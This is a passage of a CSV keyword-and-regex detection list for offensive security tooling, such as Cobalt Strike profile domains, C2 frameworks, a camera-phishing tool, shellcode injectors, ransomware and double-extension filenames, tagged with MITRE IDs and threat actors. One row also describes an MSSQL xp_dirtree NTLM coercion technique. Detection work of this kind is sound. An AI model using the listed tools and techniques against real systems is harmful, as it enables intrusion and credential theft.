T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "*.static.123456.*",".{0,1000}\.static\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.status.123456.*",".{0,1000}\.status\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.store.123456.*",".{0,1000}\.store\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.striker.local*",".{0,1000}\.striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*.support.123456.*",".{0,1000}\.support\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.tor2web *",".{0,1000}\.tor2web\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*.torproject.org/*/download/tor/*",".{0,1000}\.torproject\.org\/.{0,1000}\/download\/tor\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.tunneler/cf.log*",".{0,1000}\.tunneler\/cf\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/cloudflared*",".{0,1000}\.tunneler\/cloudflared.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/loclx*",".{0,1000}\.tunneler\/loclx.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.tunneler/loclx.log*",".{0,1000}\.tunneler\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*.txt shellcode hta*",".{0,1000}\.txt\sshellcode\shta.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt shellcode macro*",".{0,1000}\.txt\sshellcode\smacro.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt shellcode ms*",".{0,1000}\.txt\sshellcode\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*.txt.bat*",".{0,1000}\.txt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.dll*",".{0,1000}\.txt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.exe*",".{0,1000}\.txt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.htm*",".{0,1000}\.txt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.iso*",".{0,1000}\.txt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.jar*",".{0,1000}\.txt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.jasmin*",".{0,1000}\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.txt.js",".{0,1000}\.txt\.js","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.sfx*",".{0,1000}\.txt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.txt.vbs*",".{0,1000}\.txt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.unconstrained.txt*",".{0,1000}\.unconstrained\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.videos.123456.*",".{0,1000}\.videos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.villain_core*",".{0,1000}\.villain_core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*.vpn.123456.*",".{0,1000}\.vpn\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.webmail.123456.*",".{0,1000}\.webmail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.wiki.123456.*",".{0,1000}\.wiki\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.win10.config.fireeye*",".{0,1000}\.win10\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*.win7.config.fireeye*",".{0,1000}\.win7\.config\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*.WriteLine(""SharpRDP"")*",".{0,1000}\.WriteLine\(\""SharpRDP\""\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.xls.bat*",".{0,1000}\.xls\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.dll*",".{0,1000}\.xls\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.exe*",".{0,1000}\.xls\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.htm*",".{0,1000}\.xls\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.iso*",".{0,1000}\.xls\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.jar*",".{0,1000}\.xls\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.js*",".{0,1000}\.xls\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.sfx*",".{0,1000}\.xls\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xls.vbs*",".{0,1000}\.xls\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.bat*",".{0,1000}\.xlsx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.dll*",".{0,1000}\.xlsx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.exe*",".{0,1000}\.xlsx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.htm*",".{0,1000}\.xlsx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.iso*",".{0,1000}\.xlsx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.jar*",".{0,1000}\.xlsx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.jasmin*",".{0,1000}\.xlsx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.xlsx.js*",".{0,1000}\.xlsx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.sfx*",".{0,1000}\.xlsx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xlsx.vbs*",".{0,1000}\.xlsx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.xp_dirtree *\*",".{0,1000}\.xp_dirtree\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","If you have low-privileged access to a MSSQL database and no links are present you could potentially force NTLM authentication by using the xp_dirtree stored procedure to access this share. If this is successful the NetNTLM for the SQL service account can be collected and potentially cracked or relayed to compromise machines as that service account.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.zip.exe*",".{0,1000}\.zip\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.zip.iso*",".{0,1000}\.zip\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/#kali-installer-images*",".{0,1000}\/\#kali\-installer\-images.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/*_priv_esc.*",".{0,1000}\/.{0,1000}_priv_esc\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities 